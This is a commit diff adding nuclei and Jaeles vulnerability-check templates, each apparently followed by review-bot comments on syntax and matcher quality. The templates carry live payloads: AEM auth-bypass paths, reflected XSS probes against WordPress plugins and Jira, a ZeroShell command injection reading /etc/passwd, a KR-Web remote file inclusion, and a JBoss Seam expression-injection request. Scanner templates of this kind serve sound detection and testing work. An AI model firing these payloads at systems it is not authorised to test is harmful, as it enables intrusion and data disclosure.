forked from coolboy0816/pxplan
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #1 from BabelQwerty/dev
add some nuclei pocs
Showing 521 changed files with 19,167 additions and 0 deletions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: aem-misconfigs | ||
|
||
info: | ||
name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with | ||
author: panch0r3d | ||
severity: high | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/apps/system/config/.tidy.-1.json?.css" | ||
- "{{BaseURL}}/bin/querybuilder.json?path=/apps/system/config&p.hits=full&p.limit=-1?.js" | ||
- "{{BaseURL}}/crx/de/index.jsp?.js" | ||
- "{{BaseURL}}/crx/explorer/browser/index.jsp?.css" | ||
- "{{BaseURL}}/crx/packmgr/index.jsp?.json" | ||
- "{{BaseURL}}/bin/querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html" | ||
- "{{BaseURL}}/bin/querybuilder.json?p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000&p.start=1?.js" | ||
- "{{BaseURL}}/libs/granite/core/content/login.html?.ico" | ||
- "{{BaseURL}}/etc/reports/diskusage.html?.html" | ||
- "{{BaseURL}}///crx///de///index.jsp?.css" | ||
- "{{BaseURL}}///bin///querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html" | ||
headers: | ||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- '(success).*?["][:](true).*?["](results)' | ||
- '(CRXDE).(Lite)' | ||
- '(Content).(Explorer)' | ||
- '(CRX).(Package).(Manager)' | ||
- '(Adobe)' | ||
part: body |
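Review bot: `matchers-condition: and` has nothing to combine here, since the template carries a single matcher, and the last regex alternative `(Adobe)` fires on any page that merely mentions Adobe (the entries in a `regex:` list are OR-ed by default), so a hit from this template cannot be trusted without manual confirmation. Drop `(Adobe)` or tie it to one of the concrete markers already listed (`CRXDE Lite`, `Content Explorer`, `CRX Package Manager`), move the free-text remark in `name:` ("not an exhaustive list but ones Ive had luck with") into a `description:`, and add `reference:` and `tags:` so the template can be selected and excluded the same way as the other files in this commit.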
@@ -0,0 +1,21 @@ | ||
id: cve-2005-2428 | ||
info: | ||
name: Lotus Domino Sensitive Information Leak | ||
risk: Medium | ||
|
||
params: | ||
- root: '{{.BaseURL}}' | ||
|
||
requests: | ||
- method: GET | ||
redirect: false | ||
url: >- | ||
{{.root}}/names.nsf/People?OpenView | ||
headers: | ||
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
detections: | ||
- >- | ||
StatusCode() == 200 && RegexSearch('resBody', '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)') | ||
reference: | ||
- link: https://www.cvebase.com/cve/2005/2428 |
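Review bot: this file is not a nuclei template, whatever the commit message says: `params:`, `url: >-`, `{{.root}}`, `detections:` and `RegexSearch('resBody', ...)` are Jaeles signature syntax, and nuclei will fail to load it because there is no `requests[].path` and no `matchers` block. Either convert it (path `{{BaseURL}}/names.nsf/People?OpenView`, a `status` matcher for 200 and a `regex` matcher on the body with the same pattern) or keep it in a separate directory so a nuclei run over this tree does not log a parse error for it. The `id` is also lowercase (`cve-2005-2428`) while the other CVE templates in this commit use the `CVE-` prefix.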
@@ -0,0 +1,26 @@ | ||
id: CVE-2007-0885 | ||
|
||
info: | ||
name: Rainbow.Zen Jira XSS | ||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. | ||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded | ||
author: geeknik | ||
severity: medium | ||
tags: cve,cve2007,jira,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "\"><script>alert('{{randstr}}')</script>" | ||
- type: status | ||
status: | ||
- 200 | ||
- type: word | ||
part: header | ||
- "text/html" |
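Review bot: the third matcher is malformed YAML: the final `- "text/html"` is a sequence entry placed directly under the `part: header` mapping with no `words:` key, so the parser rejects the whole template rather than just that matcher. Insert a `words:` line between `part: header` and `- "text/html"`, following the layout of the first matcher. The use of `{{randstr}}` in both the path and the body matcher is the right pattern and is worth copying into the static `alert(123)` templates elsewhere in this commit.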
@@ -0,0 +1,20 @@ | ||
id: CVE-2009-0545 | ||
|
||
info: | ||
name: ZeroShell <= 1.0beta11 Remote Code Execution | ||
author: geeknik | ||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. | ||
reference: https://www.exploit-db.com/exploits/8023 | ||
severity: critical | ||
tags: cve,cve2009,zeroshell,kerbynet,rce | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" | ||
|
||
matchers: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "root:[x*]:0:0:" |
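Review bot: this request does not just fingerprint the flaw, it runs a command on the target (`getkey ../../../etc/passwd`) and retrieves `/etc/passwd`, so `description:` should state that the check is intrusive and the template should carry a tag operators can use to exclude it from routine scans (the community convention is `intrusive`). The single `regex` matcher `root:[x*]:0:0:` is adequate on its own; an error page that echoes the request is unlikely to contain that string, so no `status` matcher is needed.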
@@ -0,0 +1,26 @@ | ||
id: CVE-2009-4223 | ||
|
||
info: | ||
name: KR-Web <= 1.1b2 RFI | ||
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents. | ||
reference: | ||
- https://sourceforge.net/projects/krw/ | ||
- https://www.exploit-db.com/exploits/10216 | ||
author: geeknik | ||
severity: high | ||
tags: cve,cve2009,krweb,rfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=https://{{interactsh-url}}/file.txt" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "http" |
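Review bot: `description:` is a copy of the project's own blurb, typos included (`semplifying`, `Elsewere`, `hyerarchize`), and says nothing about the vulnerability; replace it with a one-line statement that `adm/krgourl.php` includes a remote file taken from the `DOCUMENT_ROOT` parameter. The interactsh callback is the right detection for an RFI, but under `matchers-condition: and` a host that returns a non-200 after the include (a PHP warning escalating to a 500, for example) is reported clean even though the callback arrived; consider whether the `status` matcher is needed at all.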
@@ -0,0 +1,23 @@ | ||
id: cve-2010-1871 | ||
info: | ||
name: JBoss Seam 2 Code Execution | ||
risk: High | ||
|
||
params: | ||
- root: '{{.BaseURL}}' | ||
|
||
variables: | ||
- endpoint: | | ||
seam-booking/home.seam | ||
requests: | ||
- method: GET | ||
redirect: false | ||
url: >- | ||
{{.root}}/{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]} | ||
headers: | ||
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 | ||
detections: | ||
- >- | ||
StatusCode() == 302 && StringSearch("resHeader", "pwn.seam") && StringSearch("resHeader", "?pwned=") | ||
references: | ||
- https://www.cvebase.com/cve/2010/1871 |
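Review bot: same problem as the Lotus Domino file in this commit: `params:`, `variables:`, `url: >-` and `detections:` with `StatusCode()`/`StringSearch()` are Jaeles signature syntax, not nuclei, so this file will not load under nuclei. The key is also spelled `references:` here and `reference:` in the Domino file. If it is converted, the detection maps to a `status` matcher for 302 plus a `word` matcher with `part: header` for `pwn.seam` and `?pwned=` under `matchers-condition: and`.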
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-4618 | ||
|
||
info: | ||
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
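Review bot: the probe value `alert(123)` is fixed, so any response that already contains the literal `<script>alert(123)</script>` (cached output from an earlier scan, leftovers from another tool) satisfies the body matcher and yields a false positive; use `{{randstr}}` in both the path and the `words` entry, as the CVE-2007-0885 template in this same commit does. A `description:` naming the vulnerable parameter (`page` in `advancedtext.php`) is also missing.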
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-4624 | ||
|
||
info: | ||
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
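Review bot: the `words` entry `<script>alert(123)</script>` is not bound to this request, so `{{randstr}}` should replace `123` in both the path and the matcher, as in the other daffainfo XSS templates here. Beyond that, `reference:` points only at NVD; a link to the advisory that named `facebook.php?i=` as the sink would let a reviewer verify the path without rerunning the probe, and `description:` is missing entirely.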
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-4926 | ||
|
||
info: | ||
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
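Review bot: `description:` is missing, so a reader cannot tell from the template that the injection point is the `page` parameter of `adminimize_page.php` without URL-decoding the path; add it, and replace the static `123` with `{{randstr}}` in the path and the body matcher so the match is tied to this specific request rather than to any page carrying the literal string. The three-matcher `and` (body word, `text/html` header, status 200) is otherwise consistent with the sibling templates.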
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5107 | ||
|
||
info: | ||
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
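Review bot: the path hard-codes `/trunk/` inside the plugin directory, which is the layout of the plugin's SVN repository; nothing in the template says whether deployed installs actually ship that subdirectory, so a reviewer cannot tell if this probe only matches raw checkouts. State it in a `description:` (also missing here), and replace the fixed `alert(123)` with `{{randstr}}` in both the path and the `words` entry so the body matcher cannot be satisfied by unrelated content.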
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5179 | ||
|
||
info: | ||
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
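Review bot: the body matcher is a static `<script>alert(123)</script>`, so a hit does not prove that this request was reflected; use `{{randstr}}` in the path and in `words` so the matched string is unique to the probe. `description:` is also missing, and the name alone does not say that `skysa.php?submit=` is the sink.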
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5181 | ||
|
||
info: | ||
name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
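Review bot: with `matchers-condition: and`, the `status: 200` requirement means a server that reflects `cdwidgetid` on a 404 or 500 error page (common when a plugin PHP file is called directly) is reported as not vulnerable even though the body matcher fired; consider dropping or widening the status matcher. Replace the static `123` with `{{randstr}}` in the path and the `words` entry, and add the missing `description:`.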
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5265 | ||
|
||
info: | ||
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
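Review bot: `cached_image.php?snum=` is the sink but nothing in the template says so; add a `description:`, and as with the other WordPress XSS templates in this commit, replace the fixed `alert(123)` with `{{randstr}}` in both the path and the `words` entry so the body matcher cannot be satisfied by unrelated content. The remaining structure (body word, `text/html` header, status 200 under `and`) matches the sibling templates and is fine.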